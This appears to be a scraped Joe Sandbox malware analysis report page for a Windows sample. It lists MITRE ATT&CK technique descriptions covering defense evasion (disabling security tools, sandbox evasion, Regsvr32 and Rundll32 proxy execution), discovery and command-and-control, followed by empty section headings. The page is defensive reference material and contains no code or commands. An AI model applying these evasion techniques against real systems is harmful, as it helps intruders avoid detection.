Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report DAQzQ6FyNs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Code Manipulations

Statistics

Behavior

System Behavior